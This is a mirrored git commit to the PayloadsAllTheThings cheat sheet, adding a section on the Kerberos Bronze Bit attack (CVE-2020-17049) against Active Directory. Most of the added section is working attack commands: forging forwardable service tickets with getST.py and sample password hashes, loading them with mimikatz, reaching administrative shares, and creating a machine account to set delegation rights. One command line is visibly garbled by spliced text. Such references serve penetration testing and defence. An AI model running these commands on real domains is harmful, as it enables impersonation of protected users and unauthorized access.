mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Bronze Bit Attack
This commit is contained in:
parent
66a0fd1cbe
commit
67752de6e9
@ -65,6 +65,7 @@
|
||||
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
|
||||
- [Kerberos Constrained Delegation](#kerberos-constrained-delegation)
|
||||
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
|
||||
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
|
||||
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
||||
- [PrivExchange attack](#privexchange-attack)
|
||||
- [PXE Boot image attack](#pxe-boot-image-attack)
|
||||
@ -1839,6 +1840,56 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
||||
[+] Ticket successfully imported!
|
||||
```
|
||||
|
||||
### Kerberos Bronze Bit Attack - CVE-2020-17049
|
||||
|
||||
> An attacker can impersonate users which are not allowed to be delegated. This includes members of the **Protected Users** group and any other users explicitly configured as **sensitive and cannot be delegated**.
|
||||
|
||||
> Patch is out on November 10, 2020, DC are most likely vulnerable until [February 2021](https://support.microsoft.com/en-us/help/4598347/managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049).
|
||||
|
||||
:warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)`
|
||||
|
||||
Requirements:
|
||||
* Service account's password hash
|
||||
* Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`
|
||||
* [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013)
|
||||
|
||||
**Attack #1** - Bypass the `Trust this user for delegation to specified services only – Use Kerberos only` protection and impersonate a user who is protected from delegation.
|
||||
|
||||
```powershell
|
||||
# forwardable flag is only protected by the ticket encryption which uses the service account's password
|
||||
$ getST.py -spn cifs/Service2.test.local -impersonate Administrator -hashes <LM:NTLM hash> -aesKey <AES hash> test.local/Service1 -force-forwardable -dc-ip <Domain controller> # -> Forwardable
|
||||
|
||||
$ getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable
|
||||
|
||||
# Load the ticket
|
||||
.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit
|
||||
|
||||
# Access "c$"
|
||||
ls \\service2.test.local\c$
|
||||
```
|
||||
|
||||
**Attack #2** - Write Permissions to one or more objects in the AD
|
||||
|
||||
```powershell
|
||||
# Create a new machine account
|
||||
Import-Module .\Powermad\powermad.ps1
|
||||
New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force)
|
||||
.\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit
|
||||
|
||||
# Set PrincipalsAllowedToDelegateToAccount
|
||||
Install-WindowsFeature RSAT-AD-PowerShell
|
||||
Import-Module ActiveDirectory
|
||||
Get-ADComputer AttackerService
|
||||
Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$
|
||||
Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount
|
||||
|
||||
# Execute the attack
|
||||
python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardableet-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$
|
||||
|
||||
# Load the ticket
|
||||
.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null
|
||||
```
|
||||
|
||||
### Relay delegation with mitm6
|
||||
|
||||
Prerequisites:
|
||||
@ -2148,3 +2199,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/)
|
||||
* [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort, September 2020](https://www.secura.com/pathtoimg.php?id=2055)
|
||||
* [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces)
|
||||
* [CVE-2020-17049: Kerberos Bronze Bit Attack – Practical Exploitation - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/)
|
||||
* [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/)
|
||||
* [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory)
|
||||
|
Loading…
Reference in New Issue
Block a user